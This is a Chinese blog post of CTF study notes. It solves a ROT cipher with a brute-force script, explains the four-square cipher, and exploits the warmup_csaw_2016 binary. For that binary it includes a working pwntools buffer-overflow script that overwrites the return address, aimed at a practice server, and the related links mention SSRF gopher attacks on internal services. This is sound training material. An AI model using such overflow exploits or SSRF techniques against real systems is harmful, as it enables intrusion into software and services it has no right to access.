CTF学习记录

最新推荐文章于 2024-05-13 21:01:49 发布
最新推荐文章于 2024-05-13 21:01:49 发布
阅读量440 收藏
点赞数
分类专栏: WP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blateor/article/details/104832057
版权

0x01 Crypto

ROT

题目链接:点击获取

思路

首先,需要了解什么是ROT。ROT是一种简单的替换算法,这种算法的主要加密方法是将所有明文密码同时左移或者右移某一长度,常见的是ROT13。ROT可以在二十六个字母之间替换,也可以在所有可见字符替换,如果没有指明是什么替换的话,全部试一遍也许是个不错的选择,运算量也不大。恺撒加密可以是为ROT的一种。

解密代码
import hashlib

cipher = [83, 89, 78, 84, 45, 86, 96, 45, 115, 121, 110, 116, 136, 132, 132, 132, 108, 128, 117, 118, 134, 110, 123,
          111, 110, 127, 108, 112, 124, 122, 108, 118, 128, 108, 131, 114, 127, 134, 108, 116, 124, 124, 113, 108, 76,
          76, 76, 76, 138, 23, 90, 81, 66, 71, 64, 69, 114, 65, 112, 64, 66, 63, 69, 61, 70, 114, 62, 66, 61, 62, 69,
          67, 70, 63, 61, 110, 110, 112, 64, 68, 62, 70, 61, 112, 111, 112]

def check():
    flag = "flag{www_shiyanbar_com_is_very_good_"
    # print hashlib.md5(flag).hexdigest()
    for a in range(32, 127):
        for b in range(32, 127):
            for c in range(32, 127):
                for d in range(32, 127):
                    print flag + chr(a) + chr(b) + chr(c) + chr(d) + "}"
                    if str(hashlib.md5(flag + chr(a) + chr(b) + chr(c) + chr(
                            d) + "}").hexdigest()) == "38e4c352809e150186920aac37190cbc":
                        print flag + chr(a) + chr(b) + chr(c) + chr(d)
                        return
if __name__ == '__main__':
    for j in range(16):
        flag = ""
        for i in cipher:
            flag += chr(i - j)
        print flag
    check()
flag

本来以为flag后面都是小写字母,所以一开始只跑了小写字母,跑了半天跑不出来,扩大范围后成功搞定:

img

四面八方

题目链接:点击获取

思路

来自题目的提示,四面八方,提示四方密码。四方密码是一种对称式加密法,由法国人Felix Delastelle(1840年–1902年)发明。 这种方法将字母两个一组,然后采用多字母替换密码。首先选择两个英文字作密匙,例如example和keyword。对于每一个密匙,将重复出现的字母去除,即example要转成exampl,然后将每个字母顺序放入矩阵,再将余下的字母顺序放入矩阵,便得出加密矩阵。
将这两个加密矩阵放在右上角和左下角,余下的两个角放a到z顺序的矩阵:
加密的步骤:

  1. 两个字母一组地分开讯息:(例如hello world变成he ll ow or ld);
  2. 找出第一个字母在左上角矩阵的位置;
  3. 同样道理,找第二个字母在右下角矩阵的位置;
  4. 找右上角矩阵中,和第一个字母同行,第二个字母同列的字母;
  5. 找左下角矩阵中,和第一个字母同列,第二个字母同行的字母;
  6. 得到的这两个字母就是加密过的讯息。
  7. he lp me ob iw an ke no bi的加密结果:FY NF NE HW BX AF FO KH MD

flag

自己动手画

0x02 PWN

warmup_csaw_2016

题目链接:点击获取

思路

IDA打开之后,可以看到:

可以看到危险函数gets,常见的危险函数还有strcpy,strcat,sprintf。这些函数可以造成缓冲区溢出。简单的说,我们需要用数据填充缓冲区,覆盖返回地址,这样我们就可以控制代码执行。在这个程序中,存在一个构造好的函数,用于读取flag。

这个地址也被输给我们了,所以我们只要确定到底要覆盖多长就行了。开启pwn-dbg调试。

我们可以用python的pwn模块下的cyclic函数构造一个比较长的字符串并输入,可以发现:

可以发现长度为72

代码
import pwn
#p = pwn.process('./warmup_csaw_2016')
p = pwn.remote('node3.buuoj.cn',26272)
elf = pwn.ELF('./warmup_csaw_2016')
assdr = 0x40060d
pwn.context.log_level = 'DEBUG'
pwn.context(arch='amd64', os='linux')
shellcode = 'a'*72+pwn.p64(assdr)
p.sendline(shellcode)
p.interactive()#
ch3cke
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结。
anaconda 配置不同版本cuda方法
LMM_AI的博客
06-19 7000
方法1:在系统用软连接 方法2:在anaconda中独立设置运行环境 https://bluesmilery.github.io/blogs/a687003b/ 方法3:再尝试是否可以配置anaconda自带的cuda,暂时还不知道怎么弄
CTF自学笔记
u011005040的博客
06-21 2044
CTF自学笔记第一章:课程介绍与环境搭建1.课程介绍2.环境搭建第二章:CTF训练 SSH服务1.CTF-SSH私钥泄露信息探测分析探测结果探测大端口的信息 第一章:课程介绍与环境搭建 1.课程介绍 CTF比较中涉及内容比较复杂,我们要利用所有可以利用的资源获取flag。 2.环境搭建 安装软件:(都是数据库软件) vmware workstation 14 Virtual box 测试靶场网络环境: 1.使用 netdiscover -r ip/netmask 嗅探靶场IP (例:netdiscove
buuctf 四面八方题解
最新发布
2301_80856800的博客
05-13 556
四方密码python解密脚本
BUUCTF 打卡4
qq_52193383的博客
08-23 983
1.rot 首先看到这些数字,第一反应是觉得是ascii码,而且题目是rot,应该是属于移位密码了,把前几个数跟’flag’对应,出来的不对。既然不是小写,那应该是大写’FLAG’,得到 FLAG IS flag{www_shiyanbar_com_is_very_good_???} MD5:38e4c352809e150186920aac37190cbc 出来的是明文和md5加密后的密文,那应该是要进行爆破了。 s = '83 89 78 84 45 86 96 45 115 121 110 116 13
CTF学习路线!最详细没有之一!(建议收藏)
m0_74131821的博客
05-21 3006
对于CTF入门,现在的环境比14、15年我刚接触时好太多了
CTF入门笔记(请大家看看)
02-25
CTF入门笔记(请大家看看)
CTF笔记.one
05-06
CTF笔记,注意是.one格式,里面详细记录了很多笔记,希望对各位学习有帮助!
ook离线解码工具,ctf
11-13
1. **数据捕获**:用户可以将接收到的无线电波或模拟信号记录下来,保存为文件,供后续分析。 2. **信号解析**:工具能识别并分离出OOK信号,即使在噪声或其他信号的干扰下也能尝试恢复原始数据。 3. **频率分析**:...
CTF线下AWD脚本合集.zip
03-31
8. **教程和笔记**:可能包含了一些关于CTF比赛策略、攻防技巧和常见漏洞利用的文档或教程。 使用这个合集,新手可以快速学习到网络攻防的基本操作,理解CTF比赛中的攻防逻辑,而经验丰富的选手则可以通过其中的...
CTF入门教程(非常详细)从零基础入门到竞赛,看这一篇就够了!
m0_59162248的博客
11-13 3303
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今,已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯”。MISC(安全杂项)
buuctf 四面八方(四方密码)
weixin_44110537的博客
07-24 4978
四方密码 首先选择两个英文字作密匙,例如example和keyword。对于每一个密匙,将重复出现的字母去除,即example要转成exampl,然后将每个字母顺序放入矩阵,再将余下的字母顺序放入矩阵,便得出加密矩阵。 将这两个加密矩阵放在右上角和左下角,余下的两个角放a到z顺序的矩阵: [1] 加密的步骤: 两个字母一组地分开讯息:(例如hello world变成he ll ow or ld); 找出第一个字母在左上角矩阵的位置; 同样道理,找第二个字母在右下角矩阵的位置; 找右上角矩阵中,和第一个字母同
从零开始学习CTF的完整指南
qq_35358965的博客
04-27 2190
综上所述,作为零基础小白,想要学习 CTF 需要掌握以下几个方面的知识:Linux 系统基础、网络协议基础、二进制分析、Web 安全、杂项题型和算法与密码学等。在掌握理论知识的同时,需要通过刷题、参加比赛和构建自己的题目等方式进行实践,提高自己的技能和创造力。网络安全CTF基础入门教程t=N3I4网络安全CTF基础入门教程https://mp.weixin.qq.com/s?
BUUUCTF_crypto_四面八方
qq_45628145的博客
05-26 3258
题目信息 附件的内容是 根据两个key和题目名字四面八方知道这是四方密码,但是,这个时代题目背景应该是有点问题,四方密码1840年才出来的,这里传自唐朝。 四方密码简介 四方密码是用四个方块,然后配合字母来完成加密。四方密码需要密钥,要用任意两个单词作为密钥。比如说题目中的security和information来作为密钥,然后去处单词里面的重复字母作为真正的密钥,也就是security和informat。 然后就是介绍四方了,四方,也就是四个方块,为4个5x5的方块,方块的左上角和右下角,也就是图中的
CTF-杂项入门学习笔记分享
m0_62945162的博客
06-14 1547
CTF入门学习笔记分享-杂项
CTF 学习笔记
梁辰兴的博客
10-06 4535
CTF起源于1996年DEFCON全球黑客大会,以替代之前黑客们通过互相发起真实攻击进行技术比拼的方式。WordPress是利用PHP开发的博客平台,用户可以在支持PHP和MySQL数据库的服务上架设属于自己的网站。也可以把WordPress当做一个内容管理系统(CMS)来使用。WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的,用户可以在支持PHP和MySQL数据库的服务器上使用自己的博客。
BUUCTF:四面八方
Starbright.的博客
01-15 2457
1.题目: 2.根据题目描述,此题应该是四方密码,根据key1:security将确认秘钥1:securityabdfghklmnopqvwxz,根据key2:information确认秘钥2:informatbcdeghklpqsuvwxyz,解密得ypqcgaodrtccesnkqa,高高兴兴去提交结果错了。。。 3.仔细一看题发现还要我把它排序成一串通顺语义字符串就是一串单词为youngandsuccessful ...
2023年ctf学习路线 非常详细 推荐学习
Y525698136的博客
10-31 134
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。
ctfhub SSRF
08-27
ctfhub是一个CTF训练平台,提供了多个CTF挑战模块,其中包括了SSRF模块。SSRF(Server-Side Request Forgery)是一种攻击技术,可以利用服务器端请求伪造漏洞来发送恶意请求。在ctfhub的SSRF模块中,你可以学习和实践SSRF攻击技术,并利用平台上提供的漏洞来进行实验。 在SSRF中,有一个重要的点是请求可能会跟随302跳转。你可以尝试利用这个来绕过对IP的检测,访问位于127.0.0.1的flag.php文件,从而获取敏感信息。 此外,在SSRF中还可以使用Gopher协议来攻击内网的服务,例如Redis、Mysql、FastCGI、Ftp等等,并发送GET和POST请求。Gopher协议可以说是SSRF中的万金油,大大拓宽了SSRF的攻击面。你可以构造类似于"/?url=file:///var/www/html/flag.php"的本地地址来尝试攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [network-security:学习web安全练习的靶场,以及总结的思维导图和笔记](https://download.csdn.net/download/weixin_42118423/15763452)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [CTFHub—SSRF](https://blog.csdn.net/qq_45927819/article/details/123400074)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [CTFHUB--SSRF详解](https://blog.csdn.net/qq_49422880/article/details/117166929)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值